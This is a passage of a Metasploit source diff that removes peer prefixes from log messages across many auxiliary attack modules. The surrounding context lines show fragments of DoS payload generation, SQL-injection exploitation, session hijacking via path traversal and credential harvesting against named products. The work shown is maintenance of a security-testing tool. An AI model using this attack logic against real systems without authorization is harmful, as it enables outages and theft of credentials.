an error - using limit #{last_limit}MB") return last_limit else memory_to_use += fingerprint_step @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary end # no limit can be determined - print_warning("#{peer} - can not determine limit, will use default of #{default_limit}") + print_warning("can not determine limit, will use default of #{default_limit}") return default_limit end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary } space_to_fill = size_bytes - empty_xml.size - vprint_status("#{peer} - max XML space to fill: #{space_to_fill} bytes") + vprint_status("max XML space to fill: #{space_to_fill} bytes") payload = "&#{entity};" * (space_to_fill / 6) entity_value_length = space_to_fill - payload.length @@ -148,15 +148,15 @@ class Metasploit3 < Msf::Auxiliary def run # get the max size - print_status("#{peer} - trying to fingerprint the maximum memory we could use") + print_status("trying to fingerprint the maximum memory we could use") size = fingerprint - print_status("#{peer} - using #{size}MB as memory limit") + print_status("using #{size}MB as memory limit") # only generate once xml = generate_xml(size) for x in 1..rlimit - print_status("#{peer} - sending request ##{x}...") + print_status("sending request ##{x}...") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary c.send_request(r) # Don't wait for a response, can take very long rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index c6f8a24995..fbe1395df8 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -81,37 +81,37 @@ class Metasploit3 < Msf::Auxiliary def run # inform user of action currently selected - print_status("#{peer} - Action: #{action.name} selected") + print_status("Action: #{action.name} selected") # CHECK action if action.name == 'CHECK' - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") if check_user - print_good("#{peer} - User online") + print_good("User online") else - print_status("#{peer} - User offline") + print_status("User offline") end return end # DOS action - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") check_result = check_user if check_result == false - print_error("#{peer} - User is already offline... Exiting...") + print_error("User is already offline... Exiting...") return end # only proceed if action is DOS the target user is # online or the CHECKUSER option has been disabled - print_status("#{peer} - Targeting user: #{@sipuri}...") + print_status("Targeting user: #{@sipuri}...") dos_result = dos_user if dos_result - print_good("#{peer} - User is offline, DoS was successful") + print_good("User is offline, DoS was successful") else - print_error("#{peer} - User is still online") + print_error("User is still online") end end @@ -122,22 +122,22 @@ class Metasploit3 < Msf::Auxiliary res = send_msg(msg) if res.nil? - vprint_good("#{peer} - User #{@sipuri} is no responding") + vprint_good("User #{@sipuri} is no responding") return true elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - DoS packet successful. Response received (430 Flow Failed)") - vprint_good("#{peer} - User #{@sipuri} is no longer responding") + vprint_good("DoS packet successful. Response received (430 Flow Failed)") + vprint_good("User #{@sipuri} is no longer responding") return true elsif res =~ /404 Not Found/i - vprint_error("#{peer} - DoS packet appears successful. Response received (404 Not Found)") - vprint_status("#{peer} - User appears to be currently offline or not in a Sametime video session") + vprint_error("DoS packet appears successful. Response received (404 Not Found)") + vprint_status("User appears to be currently offline or not in a Sametime video session") return true elsif res =~ /200 OK/i vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)") vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer") return false else - vprint_status("#{peer} - Unexpected response") + vprint_status("Unexpected response") return true end end @@ -150,26 +150,26 @@ class Metasploit3 < Msf::Auxiliary # check response for current user status - common return codes if res.nil? - vprint_error("#{peer} - No response") + vprint_error("No response") return false elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - User #{@sipuri} is no longer responding (already DoS'd?)") + vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)") return false elsif res =~ /404 Not Found/i - vprint_error("#{peer} - User #{@sipuri} is currently offline or not in a Sametime video session") + vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session") return false elsif res =~ /200 OK/i - vprint_good("#{peer} - User #{@sipuri} is online") + vprint_good("User #{@sipuri} is online") return true else - vprint_error("#{peer} - Unknown server response") + vprint_error("Unknown server response") return false end end def create_message(length) # create SIP MESSAGE of specified length - vprint_status("#{peer} - Creating SIP MESSAGE packet #{length} bytes long") + vprint_status("Creating SIP MESSAGE packet #{length} bytes long") source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1) source_host = Rex::Socket.source_address(datastore['RHOST']) @@ -215,13 +215,13 @@ class Metasploit3 < Msf::Auxiliary end return res rescue ::Rex::ConnectionRefused - print_status("#{peer} - Unable to connect") + print_status("Unable to connect") return nil rescue ::Errno::ECONNRESET - print_status("#{peer} - DoS packet successful, host not responding.") + print_status("DoS packet successful, host not responding.") return nil rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_status("#{peer} - Couldn't connect") + print_status("Couldn't connect") return nil ensure # disconnect socket if still open diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 353e0dbbf5..8838dd445e 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res and res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res and res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(6) right_marker = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") loop do file = sqli(left_marker, right_marker, i, cookie, filename) diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 353e7ce052..3eeeb94f06 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res && res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary right_marker = Rex::Text.rand_text_alpha(6) sql_true = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") begin ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do @@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Timeout::Error if full.blank? - print_error("#{peer} - Timeout while exploiting sqli, nothing recovered") + print_error("Timeout while exploiting sqli, nothing recovered") else - print_error("#{peer} - Timeout while exploiting sqli, #{full.length} bytes recovered") + print_error("Timeout while exploiting sqli, #{full.length} bytes recovered") end return end diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index 0dd09d79aa..bfaf631e24 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - Unable to receive a response") + print_error("Unable to receive a response") return end @@ -213,15 +213,15 @@ class Metasploit3 < Msf::Auxiliary if rdspass.empty? and password.empty? # No pass collected, no point to store anything - print_error("#{peer} - No passwords found") + print_error("No passwords found") return end - print_good("#{peer} - rdspassword = #{rdspass}") - print_good("#{peer} - password = #{password}") - print_good("#{peer} - encrypted = #{encrypted}") + print_good("rdspassword = #{rdspass}") + print_good("password = #{password}") + print_good("encrypted = #{encrypted}") p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body) - print_good("#{peer} - password.properties stored in '#{p}'") + print_good("password.properties stored in '#{p}'") end end diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index ac02e16386..0967baf944 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # def get_session_tokens tokens = nil - print_status("#{peer} - Finding session tokens...") + print_status("Finding session tokens...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri( @@ -52,15 +52,15 @@ class Metasploit3 < Msf::Auxiliary 'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] } }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 404 - print_error("#{peer} - Could not find 'jqueryFileTree.php'") + print_error("Could not find 'jqueryFileTree.php'") elsif res.code == 200 and res.body =~ />sess_([a-z0-9]+)</ tokens = res.body.scan(/>sess_([a-z0-9]+)</) num_tokens = tokens.length.to_s.gsub(/(\d)(?=(\d\d\d)+(?!\d))/) { "#{$1}," } - print_good("#{peer} - Found #{num_tokens} session tokens") + print_good("Found #{num_tokens} session tokens") else - print_error("#{peer} - Could not find any session tokens") + print_error("Could not find any session tokens") end return tokens end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary # Get user's credentials # def get_user_info(user_id) - vprint_status("#{peer} - Retrieving user's credentials") + vprint_status("Retrieving user's credentials") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'user/fiche.php'), @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary }.to_a.shuffle] }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /User card/ record = [ res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first, @@ -89,11 +89,11 @@ class Metasploit3 < Msf::Auxiliary res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first ] unless record.empty? - print_good("#{peer} - Found credentials (#{record[0]}:#{record[1]})") + print_good("Found credentials (#{record[0]}:#{record[1]})") return record end else - print_warning("#{peer} - Could not retrieve user credentials") + print_warning("Could not retrieve user credentials") end end @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => @cookie }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /<div class="login"><a href="[^"]*\/user\/fiche\.php\?id=(\d+)">/ user_id = "#{$1}" - vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'") + vprint_good("Hijacked session for user with ID '#{user_id}'") return user_id else - vprint_status("#{peer} - Could not hijack session. Session is invalid.") + vprint_status("Could not hijack session. Session is invalid.") end end @@ -125,11 +125,11 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}" }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 200 and res.get_cookies =~ /DOLSESSID_([a-f0-9]{32})=/ return "DOLSESSID_#{$1}=#{token}" else - print_warning("#{peer} - Could not create session cookie") + print_warning("Could not create session cookie") end end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary def progress(current, total) done = (current.to_f / total.to_f) * 100 percent = "%3.2f%%" % done.to_f - vprint_status("#{peer} - Trying to hijack a session - " + + vprint_status("Trying to hijack a session - " + "%7s done (%d/%d tokens)" % [percent, current, total]) end @@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary def run return unless tokens = get_session_tokens credentials = [] - print_status("#{peer} - Trying to hijack a session...") + print_status("Trying to hijack a session...") tokens.flatten.each_with_index do |token, index| if @cookie = create_cookie(token) and user_id = get_user_id credentials << get_user_info(user_id) @@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary end if credentials.empty? - print_warning("#{peer} - No credentials collected.") + print_warning("No credentials collected.") return end cred_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/gather/drupal_openid_xxe.rb b/modules/auxiliary/gather/drupal_openid_xxe.rb index a7cae618a0..6110eb4ed8 100644 --- a/modules/auxiliary/gather/drupal_openid_xxe.rb +++ b/modules/auxiliary/gather/drupal_openid_xxe.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary res = send_openid_auth(signature) unless res - vprint_status("#{peer} - Connection timed out") + vprint_status("Connection timed out") return Exploit::CheckCode::Unknown end @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary end unless res.code == 500 - print_warning("#{peer} - Unexpected answer, trying to parse anyway...") + print_warning("Unexpected answer, trying to parse anyway...") end error_loot = parse_loot(res.body) @@ -142,12 +142,12 @@ class Metasploit3 < Msf::Auxiliary # Check if file was retrieved on the drupal answer # Better results, because there isn't URL encoding, # plus probably allows to retrieve longer files. - print_status("#{peer} - Searching loot on the Drupal answer...") + print_status("Searching loot on the Drupal answer...") unless loot?(error_loot) # Check if file was leaked to the fake OpenID endpoint # Contents are probably URL encoded, plus probably long # files aren't full, but something is something :-) - print_status("#{peer} - Searching loot on HTTP query...") + print_status("Searching loot on HTTP query...") loot?(@http_loot) end @@ -158,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary def on_request_uri(cli, request) if request.uri =~ /#{@prefix}/ - vprint_status("#{peer} - Signature found, parsing file...") + vprint_status("Signature found, parsing file...") @http_loot = parse_loot(request.uri) return end - print_status("#{peer} - Sending XRDS...") + print_status("Sending XRDS...") send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' }) end @@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary def store(data) path = store_loot("drupal.file", "text/plain", rhost, data, datastore['FILEPATH']) - print_good("#{peer} - File found and saved to path: #{path}") + print_good("File found and saved to path: #{path}") end def parse_loot(data) diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index b699d58ddf..0fe0e0039c 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -78,11 +78,11 @@ class Metasploit3 < Msf::Auxiliary } die(); EOT - print_status("#{peer} - Reading user credentials from the database") + print_status("Reading user credentials from the database") response = execute_php_code(php) if not response or response.code != 200 then - print_error("#{peer} - Failed: Error requesting page") + print_error("Failed: Error requesting page") return end @@ -93,8 +93,8 @@ class Metasploit3 < Msf::Auxiliary def run credentials = read_credentials if credentials.empty? - print_warning("#{peer} - No credentials collected.") - print_warning("#{peer} - Sometimes this is because the server isn't in the vulnerable state.") + print_warning("No credentials collected.") + print_warning("Sometimes this is because the server isn't in the vulnerable state.") return end diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index dd4bc8e7b6..a75f6dc4b3 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -116,30 +116,30 @@ class Metasploit3 < Msf::Auxiliary requests = datastore['REQUESTS'] backends = [] @uri = normalize_uri(target_uri.path.to_s) - print_status("#{peer} - Starting request #{@uri}") + print_status("Starting request #{@uri}") (1..requests).each do |i| cookie = get_cookie # Get the cookie # If the cookie is not found, stop process if cookie.empty? || cookie[:id].nil? - print_error("#{peer} - F5 BigIP load balancing cookie not found") + print_error("F5 BigIP load balancing cookie not found") return end # Print the cookie name on the first request if i == 1 - print_good("#{peer} - F5 BigIP load balancing cookie \"#{cookie[:id]} = #{cookie[:value]}\" found") + print_good("F5 BigIP load balancing cookie \"#{cookie[:id]} = #{cookie[:value]}\" found") if cookie[:id].start_with?('BIGipServer') - print_good("#{peer} - Load balancing pool name \"#{cookie[:id].split('BIGipServer')[1]}\" found") + print_good("Load balancing pool name \"#{cookie[:id].split('BIGipServer')[1]}\" found") end if cookie[:value].start_with?('rd') - print_good("#{peer} - Route domain \"#{cookie[:value].split('rd')[1].split('o')[0]}\" found") + print_good("Route domain \"#{cookie[:value].split('rd')[1].split('o')[0]}\" found") end end backend = cookie_decode(cookie[:value]) unless backend[:host].nil? || backends.include?(backend) - print_good("#{peer} - Backend #{backend[:host]}:#{backend[:port]} found") + print_good("Backend #{backend[:host]}:#{backend[:port]} found") backends.push(backend) end end @@ -150,10 +150,10 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused - print_error("#{peer} - Network connection error") + print_error("Network connection error") rescue ::Rex::ConnectionError - print_error("#{peer} - Network connection error") + print_error("Network connection error") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/gather/hp_snac_domain_creds.rb b/modules/auxiliary/gather/hp_snac_domain_creds.rb index 7610799f2b..ad4b1c1cd2 100644 --- a/modules/auxiliary/gather/hp_snac_domain_creds.rb +++ b/modules/auxiliary/gather/hp_snac_domain_creds.rb @@ -118,27 +118,27 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Get Domain Info") + print_status("Get Domain Info") session = get_session if session.nil? - print_error("#{peer} - Failed to get a valid session, maybe the target isn't HP SNAC installation?") + print_error("Failed to get a valid session, maybe the target isn't HP SNAC installation?") return end - print_status("#{peer} - Exploiting Authentication Bypass to gather Domain Controller Info...") + print_status("Exploiting Authentication Bypass to gather Domain Controller Info...") domain_info = get_domain_info(session) if domain_info.nil? - print_error("#{peer} - Failed, maybe the target isn't vulnerable") + print_error("Failed, maybe the target isn't vulnerable") return end - print_status("#{peer} - Parsing data gathered...") + print_status("Parsing data gathered...") credentials = parse_domain_data(domain_info) if credentials.empty? - print_warning("#{peer} - Any Domain Controller has been found...") + print_warning("Any Domain Controller has been found...") return end diff --git a/modules/auxiliary/gather/huawei_wifi_info.rb b/modules/auxiliary/gather/huawei_wifi_info.rb index f817643557..83e648b066 100644 --- a/modules/auxiliary/gather/huawei_wifi_info.rb +++ b/modules/auxiliary/gather/huawei_wifi_info.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def get_wifi_info - print_status("#{peer} - Getting WiFi Key details...") + print_status("Getting WiFi Key details...") res = send_request_raw( { 'method' => 'GET', @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary def get_router_info - print_status("#{peer} - Gathering basic device information...") + print_status("Gathering basic device information...") res = send_request_raw( { 'method' => 'GET', @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_ssid - print_status("#{peer} - Gathering device SSID...") + print_status("Gathering device SSID...") res = send_request_raw( { @@ -183,7 +183,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_mac_filter_info - print_status("#{peer} - Gathering MAC filters...") + print_status("Gathering MAC filters...") res = send_request_raw( { 'method' => 'GET', @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_wan_info - print_status("#{peer} - Gathering WAN information...") + print_status("Gathering WAN information...") res = send_request_raw( { 'method' => 'GET', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary end def get_router_dhcp_info - print_status("#{peer} - Gathering DHCP information...") + print_status("Gathering DHCP information...") res = send_request_raw( { 'method' => 'GET', @@ -274,19 +274,19 @@ class Metasploit3 < Msf::Auxiliary def is_target?(res) # check whether we got any response from server and proceed. unless res - print_error("#{peer} - Failed to get any response from server") + print_error("Failed to get any response from server") return false end # Is it a HTTP OK unless res.code == 200 - print_error("#{peer} - Did not get HTTP 200, URL was not found") + print_error("Did not get HTTP 200, URL was not found") return false end # Check to verify server reported is a Huawei router unless res.headers['Server'].match(/IPWEBS\/1.4.0/i) - print_error("#{peer} - Target doesn't seem to be a Huawei router") + print_error("Target doesn't seem to be a Huawei router") return false end diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index e2269fe1bb..20b3d6911b 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary @charset.push(Rex::Text.uri_encode(spec)) end end - print_status("#{peer} - Performing Bruteforce attack") - vprint_status("#{peer} - Using CHARSET: [#{@charset.join(",")}]") + print_status("Performing Bruteforce attack") + vprint_status("Using CHARSET: [#{@charset.join(",")}]") else - print_status("#{peer} - Performing dictionary based attack (#{datastore['DICT']})") + print_status("Performing dictionary based attack (#{datastore['DICT']})") end if datastore['DICT'].blank? and datastore['MAXDEPTH'] > 2 # warn user on long runs - print_status("#{peer} - Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") + print_status("Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") end # create initial test queue and populate @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary @charset.each { |char| @test_queue.push(char) } else ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } - vprint_status("#{peer} - Loaded #{@test_queue.length} values from dictionary") + vprint_status("Loaded #{@test_queue.length} values from dictionary") end @depth_warning = true @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Testing for IBM Lotus Notes Sametime User Enumeration flaw") + print_status("Testing for IBM Lotus Notes Sametime User Enumeration flaw") # test for expected response code on non-existant uid/email if datastore['TYPE'] == "UID" @@ -126,17 +126,17 @@ class Metasploit3 < Msf::Auxiliary begin if res.nil? - print_error("#{peer} - Timeout") + print_error("Timeout") return elsif res.code != 200 - print_error("#{peer} - Unexpected response from server (Response code: #{res.code})") + print_error("Unexpected response from server (Response code: #{res.code})") return elsif JSON.parse(res.body) # valid JSON response - valid response for check - print_good("#{peer} - Response received, continuing to enumeration phase") + print_good("Response received, continuing to enumeration phase") end rescue JSON::ParserError, - print_error("#{peer} - Error parsing JSON: Invalid response from server") + print_error("Error parsing JSON: Invalid response from server") return end @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end def test_handler - print_status("#{peer} - Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") + print_status("Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") test_length = 1 # initial test length set until @test_queue.empty? @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary # provide feedback to user on current test length if datastore['DICT'].blank? and test_current.length > test_length test_length = test_current.length - print_status("#{peer} - Beginning bruteforce test for #{test_length} character strings") + print_status("Beginning bruteforce test for #{test_length} character strings") end res = make_request(test_current) @@ -178,11 +178,11 @@ class Metasploit3 < Msf::Auxiliary if res.nil? and not @retries.include?(test_current) # attempt test again as the server was too busy to respond # correctly - error returned - print_error("#{peer} - Error reading JSON response, attempting to redo check for \"#{test_current}\"") + print_error("Error reading JSON response, attempting to redo check for \"#{test_current}\"") @test_queue.push(test_current) @retries << test_current if @retries.length == 10 - print_error("#{peer} - Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") + print_error("Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") end elsif res # check response for user data @@ -242,11 +242,11 @@ class Metasploit3 < Msf::Auxiliary unless @user_data.flatten.include?(userinfo['uid']) @user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ] # print newly discovered users straight to the screen if verbose mode is set - vprint_good("#{peer} - New user found: #{userinfo['uid']}") + vprint_good("New user found: #{userinfo['uid']}") report_user(userinfo['uid']) end rescue JSON::ParserError - print_error("#{peer} - Error reading JSON string, continuing") + print_error("Error reading JSON string, continuing") end end @@ -263,7 +263,7 @@ class Metasploit3 < Msf::Auxiliary @test_queue.push(test_current + char) end elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1 - vprint_status("#{peer} - Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") + vprint_status("Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") @depth_warning = false end end @@ -301,10 +301,10 @@ class Metasploit3 < Msf::Auxiliary end if not user_tbl.to_s.empty? - print_good("#{peer} - #{@user_data.length} users extracted") + print_good("#{@user_data.length} users extracted") print_line(user_tbl.to_s) else - print_error("#{peer} - No users discovered") + print_error("No users discovered") end end diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index dd0520d430..07cf026d44 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Beginning IBM Lotus Notes Sametime Meeting Room Bruteforce") + print_status("Beginning IBM Lotus Notes Sametime Meeting Room Bruteforce") print_status("Using owner: #{datastore['OWNER']}") # test for expected response code on non-existant meeting room name @@ -71,14 +71,14 @@ class Metasploit3 < Msf::Auxiliary }) unless res - print_error("#{peer} - No response, timeout") + print_error("No response, timeout") return end if res.code == 404 and res.body =~ /Room does not exist/i - vprint_status("#{peer} - Server responding to restapi requests as expected") + vprint_status("Server responding to restapi requests as expected") else - print_error("#{peer} - Unexpected response from server (#{res.code}). Exiting...") + print_error("Unexpected response from server (#{res.code}). Exiting...") return end @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } vprint_status("Loaded #{@test_queue.length} values from dictionary") - print_status("#{peer} - Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)") + print_status("Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)") while(not @test_queue.empty?) t = [] @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary Thread.current.kill if not test_current res = make_request(test_current) if res.nil? - print_error("#{peer} - Timeout from server when testing room \"#{test_current}\"") + print_error("Timeout from server when testing room \"#{test_current}\"") elsif res and res.code == 404 - vprint_status("#{peer} - Room \"#{test_current}\" was not valid for owner #{datastore['OWNER']}") + vprint_status("Room \"#{test_current}\" was not valid for owner #{datastore['OWNER']}") else # check response for user data check_response(res, test_current) diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index 59db20b9a3..d9ea98a4e6 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -192,10 +192,10 @@ class Metasploit3 < Msf::Auxiliary def report if @version_info['version']['sametimeVersion'] print_line - print_good("#{peer} - #{@version_info['version']['sametimeVersion']} Detected") + print_good("#{@version_info['version']['sametimeVersion']} Detected") else print_line - print_status("#{peer} - IBM Lotus Sametime information") + print_status("IBM Lotus Sametime information") end # configure tables @@ -298,7 +298,7 @@ class Metasploit3 < Msf::Auxiliary @version_info['conf'] = {} @version_info['api'] = {} - print_status("#{peer} - Checking IBM Lotus Sametime Server") + print_status("Checking IBM Lotus Sametime Server") URLS.each do | url | check_url(url) end @@ -312,13 +312,13 @@ class Metasploit3 < Msf::Auxiliary proxy = URI(@version_info['conf']['meetingroomcenter.stProxyAddress']).host end - print_good("#{peer} - Sametime Proxy address discovered #{proxy}") + print_good("Sametime Proxy address discovered #{proxy}") PROXY_URLS.each do | url | check_url(url, proxy) end elsif proxy? - print_status("#{peer} - Sametime Proxy address discovered, but checks disabled") + print_status("Sametime Proxy address discovered, but checks disabled") end report unless @version_info.empty? diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb index d6ddc26305..b16a028b08 100644 --- a/modules/auxiliary/gather/java_rmi_registry.rb +++ b/modules/auxiliary/gather/java_rmi_registry.rb @@ -34,53 +34,53 @@ class Metasploit3 < Msf::Auxiliary end def run - 